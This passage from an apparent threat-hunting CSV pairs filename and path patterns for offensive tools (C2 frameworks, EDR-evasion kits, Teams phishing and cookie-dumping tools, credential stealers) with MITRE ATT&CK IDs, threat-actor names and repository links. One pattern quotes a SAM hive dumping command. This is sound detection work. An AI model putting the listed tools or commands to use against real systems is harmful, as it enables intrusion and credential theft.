T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*/SweetPotato-master.zip*",".{0,1000}\/SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/Synergy-httpx.git*",".{0,1000}\/Synergy\-httpx\.git.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*/syscalls/syscalls_windows.go*",".{0,1000}\/syscalls\/syscalls_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/syscalls/syswhispers/*",".{0,1000}\/syscalls\/syswhispers\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/syscalls/syswhispersv2*",".{0,1000}\/syscalls\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/SyscallsInject/*",".{0,1000}\/SyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/sysconfig/iodine-server*",".{0,1000}\/sysconfig\/iodine\-server.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/SysmonQuiet*",".{0,1000}\/SysmonQuiet.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*/system:SystemBkup.hiv /sam:SamBkup.hiv*",".{0,1000}\/system\:SystemBkup\.hiv\s\/sam\:SamBkup\.hiv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/SysWhispers2*",".{0,1000}\/SysWhispers2.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*/SysWhispers3*",".{0,1000}\/SysWhispers3.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" 
"*/SysWhispers3.git*",".{0,1000}\/SysWhispers3\.git.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*/syswhispersv2*",".{0,1000}\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/t.me/NicestRAT*",".{0,1000}\/t\.me\/NicestRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/t2w.py*",".{0,1000}\/t2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/t3l3machus/Villain*",".{0,1000}\/t3l3machus\/Villain.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*/taidoor.profile*",".{0,1000}\/taidoor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/TakeMyRDP*",".{0,1000}\/TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - 
TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*/TakeMyRDP2.0*",".{0,1000}\/TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/Talon.py*",".{0,1000}\/Talon\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Talon/*Agent/Source*",".{0,1000}\/Talon\/.{0,1000}Agent\/Source.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/target:exe spacerunner.cs*",".{0,1000}\/target\:exe\sspacerunner\.cs.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/targetedKerberoast*",".{0,1000}\/targetedKerberoast.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*/targetedKerberoast.py*",".{0,1000}\/targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/targets-asn.nse*",".{0,1000}\/targets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-map4to6.nse*",".{0,1000}\/targets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-echo.nse*",".{0,1000}\/targets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\/targets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-mld.nse*",".{0,1000}\/targets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-slaac.nse*",".{0,1000}\/targets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-wordlist.nse*",".{0,1000}\/targets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-sniffer.nse*",".{0,1000}\/targets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-traceroute.nse*",".{0,1000}\/targets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-xml.nse*",".{0,1000}\/targets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TartarusGate.git*",".{0,1000}\/TartarusGate\.git.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*/Tash.dll*",".{0,1000}\/Tash\.dll.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashClient.*",".{0,1000}\/TashClient\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashLoader.*",".{0,1000}\/TashLoader\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Tater.ps1*",".{0,1000}\/Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/tccbypass.md*",".{0,1000}\/tccbypass\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/TChopper.git*",".{0,1000}\/TChopper\.git.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*/TCPMITM.py*",".{0,1000}\/TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/tcpshell.py*",".{0,1000}\/tcpshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/TeamFiltration.dll*",".{0,1000}\/TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/TeamFiltration.exe*",".{0,1000}\/TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" 
"*/TeamFiltration/releases/latest*",".{0,1000}\/TeamFiltration\/releases\/latest.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/Teamphisher.txt*",".{0,1000}\/Teamphisher\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*/Teamphisher/targets.txt*",".{0,1000}\/Teamphisher\/targets\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*/teams_cookies_output.json*",".{0,1000}\/teams_cookies_output\.json.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_localdb.py*",".{0,1000}\/teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/teamserver-linux.tar.gz*",".{0,1000}\/teamserver\-linux\.tar\.gz.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
